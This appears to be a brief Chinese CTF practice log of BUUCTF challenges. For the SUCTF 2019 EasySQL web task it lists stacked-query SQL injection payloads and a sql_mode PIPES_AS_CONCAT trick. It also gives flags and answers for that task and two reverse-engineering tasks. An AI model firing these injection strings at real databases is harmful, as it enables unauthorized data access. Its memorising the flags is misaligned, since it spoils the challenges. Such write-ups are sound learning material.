22.1.22
0x01 buu web [SUCTF 2019]EasySQL
看了看WP,可以看到用了
1;show databases; 1;show tables; *,1 也可以: 1;set sql_mode=PIPES_AS_CONCAT;select 1 set sql_mode=PIPES_AS_CONCAT;的作用是将||的功能从 或运算(or) 改为 字符串拼接
flag{0e8d4f51-8e3d-443b-8b8e-64dcb315e9ac}
0x02 buu rev easyre
flag{this_Is_a_EaSyRe}
0x03 buu rev reverse1
- IDA挂个动态调试断点就可以得到
- str2=
{hell0_w0rld}